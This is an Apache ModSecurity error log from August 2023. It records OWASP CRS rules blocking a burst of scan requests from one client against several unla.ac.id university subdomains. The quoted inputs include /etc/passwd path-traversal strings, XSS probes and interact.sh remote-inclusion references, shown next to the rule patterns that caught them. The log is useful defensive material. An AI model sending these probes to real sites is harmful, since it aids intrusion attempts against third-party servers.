[Tue Aug 29 11:55:36.607638 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAoz8IgAAAAS"]
[Tue Aug 29 11:55:36.662586 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq4fVIAAAAJ"]
[Tue Aug 29 11:55:36.665298 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:key: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16SMCo-f0AAAqTvu0AAAAa"]
[Tue Aug 29 11:55:37.543491 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16ScCo-f0AAAolKtYAAAAe"]
[Tue Aug 29 11:55:37.543881 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16ScCo-f0AAAq4fVUAAAAJ"]
[Tue Aug 29 11:55:37.589742 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16ScCo-f0AAAq2KeEAAAAE"]
[Tue Aug 29 11:55:37.590118 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16ScCo-f0AAAqSwwAAAAAN"]
[Tue Aug 29 11:55:37.724931 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16ScCo-f0AAAq2KeIAAAAE"]
[Tue Aug 29 11:55:37.811797 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16ScCo-f0AAAqSwwEAAAAN"]
[Tue Aug 29 11:55:38.038476 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAAolKtgAAAAe"]
[Tue Aug 29 11:55:38.108350 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16SsCo-f0AAAq3a5gAAAAI"]
[Tue Aug 29 11:55:38.111640 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16SsCo-f0AAAqeFYUAAAAx"]
[Tue Aug 29 11:55:38.113155 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16SsCo-f0AAAqTvvQAAAAa"]
[Tue Aug 29 11:55:38.121444 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAAoz8JIAAAAS"]
[Tue Aug 29 11:55:38.128905 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16SsCo-f0AAApHRj4AAAAP"]
[Tue Aug 29 11:55:38.166119 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16SsCo-f0AAAolKtoAAAAe"]
[Tue Aug 29 11:55:38.172571 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAAq3a5oAAAAI"]
[Tue Aug 29 11:55:38.192137 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAAq2KeUAAAAE"]
[Tue Aug 29 11:55:38.603614 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16SsCo-f0AAAqTvvcAAAAa"]
[Tue Aug 29 11:55:38.658877 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAApbUlUAAAAh"]
[Tue Aug 29 11:55:38.681514 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16SsCo-f0AAAq3a6AAAAAI"]
[Tue Aug 29 11:55:38.706307 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16SsCo-f0AAAq2KewAAAAE"]
[Tue Aug 29 11:55:38.756092 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAAqeFYoAAAAx"]
[Tue Aug 29 11:55:39.676673 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16S8Co-f0AAAqSwxAAAAAN"]
[Tue Aug 29 11:55:39.715611 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16S8Co-f0AAAoz8JQAAAAS"]
[Tue Aug 29 11:55:39.727307 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16S8Co-f0AAAq4fVsAAAAJ"]
[Tue Aug 29 11:55:39.852152 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16S8Co-f0AAAolKt4AAAAe"]
[Tue Aug 29 11:55:39.900764 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16S8Co-f0AAAq5@DQAAAAK"]
[Tue Aug 29 11:55:40.095043 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16TMCo-f0AAApHRkYAAAAP"]
[Tue Aug 29 11:55:40.151706 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16TMCo-f0AAAq5@DkAAAAK"]
[Tue Aug 29 11:55:40.157687 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16TMCo-f0AAApHRkkAAAAP"]
[Tue Aug 29 11:55:40.172204 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16TMCo-f0AAAq5@DoAAAAK"]
[Tue Aug 29 11:55:40.172617 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16TMCo-f0AAAqTvwMAAAAa"]
